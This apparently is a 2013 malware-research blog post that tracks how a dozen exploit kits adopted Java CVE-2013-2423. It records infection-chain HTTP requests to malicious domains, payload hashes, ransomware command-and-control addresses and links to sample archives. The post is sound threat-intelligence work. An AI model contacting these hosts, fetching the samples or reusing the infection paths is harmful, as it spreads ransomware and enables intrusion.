2013-04-23 - Exploit Integration

CVE-2013-2423 integrating Exploit Kits



One week after Patch Java7u21 the vulnerability is being exploited in mass blind attack.
( First alert come from Timo Hirvonen with CrimeBoss and later CritXPack/SafePack. Will update for these EK as soon as i land on it)

Cool EK:
CVE-2013-2423 successful path in Cool EK 2013-04-23


GET http://lekarskiejowlslight.ahmedpekin .net/works-softly.htm
200 OK (text/html)

GET http://lekarskiejowlslight.ahmedpekin .net/hopeful_orchestra-surveyor_remove.jar
200 OK (application/java-archive) 9339cb68dd4a1301f8b84da55bacd6b4

CVE-2013-2423 in Cool EK Jar


GET http://95.211.[bip]/getqq.jpg  c795ac9a7a84930c4da54439026556c6  Reveton as usual.
200 OK (application/x-msdownload)

<edit1 2013-04-26>
Sweet-Orange :


CVE-2013-2423 positive path in Sweet Orange 2013-04-26
GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/pets.php?spamnav=237
200 OK (text/html)

<edit5 2013-04-27> Security Bypass has been added.
Looks like that :
Security bypass implemented in Sweet Orange 2013-04-27

</edit5>
GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/bDCoZGmn.jar
200 OK (application/x-java-archive) d4a716a6434462ddd1b99a85f3d9cf87

CVE-2013-2423 in SWT


GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/KOrJjsK.jar
200 OK (application/x-java-archive) 49ca9dcbf4cc7176bb656ded3eb03dba



GET http://prioritiesinformationlockdown .net/iraq.php?setup=750&humor=598&star=4&virus=629&entry=171&paper=545&stars=451&intm=257&books=550&myguest=958
200 OK (application/octet-stream) Decoded payload : f94c16dc1c399849e37064e17c5337e1 (Ransomware c&c http://utrento .com/picture.php )


Undefined (for now) Ransomware landing for UK
</edit1>
<edit3 2013-04-27>
Neutrino :


"Добавлен новый эксплоит, пробив приятно поднялся ;)"
translated as :
Added a new exploit, breaking up nicely ;)

CVE-2013-2423 in Neutrino 2013-04-27 with Security Bypass


Security Bypass  (as explained by Security Immunity) in Neutrino
after some decoding
<edit 2013-06-26 : after comment here are more data : http://pastebin.com/raw.php?i=NfYC76Zi
Jnlp After Base64 decode
/>
GET http://evaluation-man .net/ldeiyxlmeiujjn?fqemlffr=5884689
200 OK (text/html)

GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)

GET http://evaluation-man .net/scripts/js/plugin_detector.js
200 OK (application/x-javascript)

POST http://evaluation-man .net/cvwrssa
200 OK (text/html)

GET http://evaluation-man .net/eqtmw?hvvsxlyebdkj=517ba030aaa2cc8561032cc5
200 OK (application/java-archive)  4387db4a1da8f8f68df4369f8e6d46b6


CVE-2013-2423 in Neutrino Jar


GET http://evaluation-man .net/puvpdxcfdwntco?htigpfblxyx=517ba030aaa2cc8561032cc5
200 OK (application/octet-stream) Decoded payload : a69ffadf3d021f3edfb7b811e2fcb753 Urausy

Part of Urausy LU Design 2013-04-27



File: Neutrino_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit3>
<edit4 2013-04-27>
Sakura :


CVE-2013-2423 & Security Bypass successful path in Sakura EK
GET http://ef4g.stencilmaster1 .com:88/page/word.php
200 OK (text/html)

Security Bypass in Sakura (after partial deobfus) - 2013-04-27


GET http://ef4g.stencilmaster1 .com:88/page/important_whole_mile.php
200 OK (application/x-java-archive) b7c19737bcbeb0613ade20b71e2797fe

CVE-2013-2423 in Sakura Jar file 2013-04-27
GET http://ef4g.stencilmaster1 .com:88/page/3906.htm
200 OK (application/octet-stream)  Decoded payload : 1ecc8081e6fe50c886735c45e788d16d


Part of Urausy NL Design 2013-04-27


Files : Sakura_Landing_Jar_Payload_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit4>
<edit6 2013-04-27>
Styx :
At least 3 hours providing that jar without infecting...it appears now to be fully operationnal
Successful CVE-2013-2423 + Security bypass in Styx
+ Payload Urausy Call Home
GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/
200 OK (text/html)

GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/jrr.html
200 OK (text/html)

Embedded jnlp for Security Bypass


GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/sdghsHHj.jar
200 OK (text/html) 702ad790017148b8eedd46ce5599a06f

CVE-2013-2423 in Styx Jar 2013-04-27


GET http://1perfotas.gotgeeks .com/OoTtsV0poEU0xnad0KaY910BMP0MRvW0emfi0nW3n0rEFd06afI0di5J0QjCx0OufD06IHF0CViI0ZVum0V3tm0zzAk14xMn0TcLD01PmR0nee80H9JU0Rdwk12WwY09mps0ZYSm0nX5o0OhKa17Z8N16eY5126Nc0hQ6m0ML3m0gjjR0EYoV0tEYB14CSM0GpRt0unAj0dUrn0vhxG0htLK12MMq0SNVP0OGdP/Er3jvhs7jf.exe?fJ2pf=XUaPp&h=13
200 OK (application/octet-stream)  Payload decoded (for now...) 1f9d504d0c3ad25ca42fbc661070d075 Urausy again...

Part of Urausy US Design 2013-04-27
Files: Styx_Landing_SecurityBypass_Jar_Payload_2013-04-27.zip
</edit6>
<edit7 2013-04-30>
Redkit:
Spotted by @UnicornSec on 2013-04-29
CVE-2013-2423 in Redkit 2013-04-30
GET http://electricfireplaceheater .net/wnqm.html
200 OK (text/html)

GET http://electricfireplaceheater .net/roh.jnlp
200 OK (text/html)

GET http://electricfireplaceheater .net/aae.jnlp
200 OK (text/html)

Redkit jnlp for Security Bypass 2013-04-30


GET http://electricfireplaceheater .net/qv3.jar
200 OK (application/java-archive) 5623b9a385e3eec21bf4d5d2fe63e45d

CVE-2013-2493 in Redkit Jar 2013-04-30
GET http://electricfireplaceheater .net/11.html
200 OK (application/octet-stream)

Out of scope but here are the Payloads :
1: 8586611fc023048abac469bfe681117b 2: cf0ae96521b423ebe10593e7de1f6a9c (it's Karagny i think)
3: b9e6d133e163b0d0e4efb144316d528e 4: 280683d62667a7bd8411565fd212707f
5: 5de26a11e59a84368db5f56cc9c997cc Zaccess 6: 13bd23da493896001f6d107f1bf1afc0

Files : Redkit_CVE-2013-2423_2013-04-30.zip (OwnCloud via goo.gl)


Nuclear Pack :
Announced on multiple underground forum since 2013-04-27

добавлен новый Java exploit
пробив увеличился в 2 раза!!
Работает тих без окон!!!

Translated by google as :

added a new Java exploit
breaking increased by 2 times!
Runs quiet with no windows!

Thanks Chris Wakelin who spotted it and shared referrer

CVE-2013-2423 successful path In Nuclear Pack 2013-04-30
GET http://exhaustedpcscreen .biz:38895/f2b0557f683e6c422931704802693850.html
200 OK (text/html)
 http://wepawet.iseclab.org/view.php?hash=6d3b3650005593ab6955750c2f7e2097&type=js

Landings interpreted by Wepawet
Base64 decode of the Security Bypass "zone"
GET http://exhaustedpcscreen .biz:38895/2d3a14952063b1bba31bd5613d62d58e/1367323505/539816c0e7725da387899afdc64a602c.jar
200 OK (application/java)  ac29a615ec7ff5d3f238effca6e9095d

CVE-2013-2423 in a Nuclear Pack  jar 2013-04-30
GET http://exhaustedpcscreen .biz:38895/f/1367323505/539816c0e7725da387899afdc64a602c/2d3a14952063b1bba31bd5613d62d58e/2
200 OK (application/octet-stream) a2fcdd67062b8cd866b4a642277f24e2 Citadel

GET http://exhaustedpcscreen .biz:38895/f/1367323505/539816c0e7725da387899afdc64a602c/2d3a14952063b1bba31bd5613d62d58e/2/2
200 OK (application/octet-stream)

SofosFO/StampEK :
CVE-2013-2423 positive path in SofosFO/Stamp EK
GET http://cubicle.zeusfte .biz/switzerallege-schematic
200 OK (text/html)

GET http://cubicle.zeusfte .biz/kkethh1yogmrErparmDQGwe4gerparGg/FGZa2../prosperity.php5
200 OK (text/html)

GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/901212121255
200 OK (text/html)

Security Bypass in SofosFO/Stamp EK 2013-04-30


GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/name.jar
200 OK (text/html)

GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/9013312341/double.jar
200 OK (application/java-archive)

CVE-2013-2423 part in jar from SofosFO/StampEK


GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/name.jar
200 OK (text/html)

GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/95555555555551/1704114
200 OK (application/java-archive) Decoded Payload : 0bfc916bd2c95a98234b19c8976686a5 (Reveton...seems Cool EK is facing troubles. Distribution moved to SofosFO and Sweet Orange).

Piece of Reveton FR Design 2013-04
C&C : 69.197.217.85

Connexion to Reveton C&C 2013-04-30

Entry point: FG00


GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/MyApplet.class
200 OK (text/html)


Files : SofosFO_CVE-2013-2423_Reveton_SecuByP.zip (OwnCloud via goo.gl)
</edit7>
<edit8 2013-05-01>
Sibhost :


CVE-2013-2423 successful path in Sibhost
(Urls Removed cause it's a "forged" link)
GET http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu
200 OK (text/html)
Security Bypass (embedded jnlp in the landing) in Sibhost 2013-05-01

GET http://[Redacted]/deployJava.js
200 OK (application/javascript)

GET http://[Redacted]/deployJava.js
200 OK (application/javascript)

GET http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu2.zip
200 OK (application/octet-stream) e041223ecd039e5a01f8e4cac5ca9c96

CVE-2013-2423 in Sibhost Jar 2013-05-01
(including encoded payload - Urausy)


Decoded payload :  3bce54da0e5a8f1c56787c60b389ff56 (Urausy as always on this Exploit kit)


Part of Urausy LU design 2013-05-01


POST http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu?id=2
200 OK (text/html) (<- stats call back)


</edit8>
<edit 9 2013-05-06>
WhiteHole :
CVE-2013-2423 in WhiteHole 2013-05-06
GET http://1367825417.hopto .org/temp/newyear/d0e3c0b/?cmp=98
200 OK (text/html)

Security Bypass in WhiteHole 2013-05-06

GET http://1367825417.hopto .org/temp/newyear/deployJava.js
200 OK (application/javascript)

GET http://1367825417.hopto .org/temp/newyear/2b075/?java=98
200 OK (text/html)

GET http://1367825417.hopto .org/temp/newyear/JavaN.jar?java=98
200 OK (application/java-archive) b36e2a4326d80fdd605650363cae50a9

GET http://1367825417.hopto .org/temp/newyear/JavaZ.jar?java=98
200 OK (application/java-archive) a46b973d293fc787905a0d6d9d103eb3 < CVE-2013-2423

CVE-2013-2423 in WhiteHole Jar


GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=98
302 Found to http://1367825417.hopto.org/temp/softl98ii.exe

GET http://1367825417.hopto .org/temp/softl98ii.exe
200 OK (application/x-msdos-program) 1d7dc35322dcc21e84bd72eafc2b167d < Urausy

Part of Urausy BE Design 2013-05-06


GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=98
504 Gateway Time-out (text/html)

GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=9802
504 Gateway Time-out (text/html)

GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=9802
504 Gateway Time-out (text/html)

GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=9803
504 Gateway Time-out (text/html)

GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=9803
504 Gateway Time-out (text/html)


Files : WhiteHole_CVE-2013-2423.zip (OwnCloud via Goo.gl)
</edit9>

Reading :
CVE-2013-2423 on mitre
CVE-2013-2423 Metasploit Module
Java is So Confusing... - Trustwave/Spiderlabs - Anat Davidi -2013-04-19
Java 7 Update 21 - IKVM.Net Weblog - 2013-04-17
Post Publication Readings :
Yet Another Java Security Warning Bypass - Immunity - 2013-04-24 - Esteban Guillardoy
The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423) - Security Obscurity - 2013-04-26
K.I.A. – Java CVE 2013-2423 Via New and Improved Cool EK - Anup Ghosh - Invincea - 2013-04-26

EXPLOIT-KIT
Sakura StampEK SofosFO Sibhost Redkit Nuclear Pack SWT Neutrino CVE-2013-2423 Styx WhiteHole Cool EK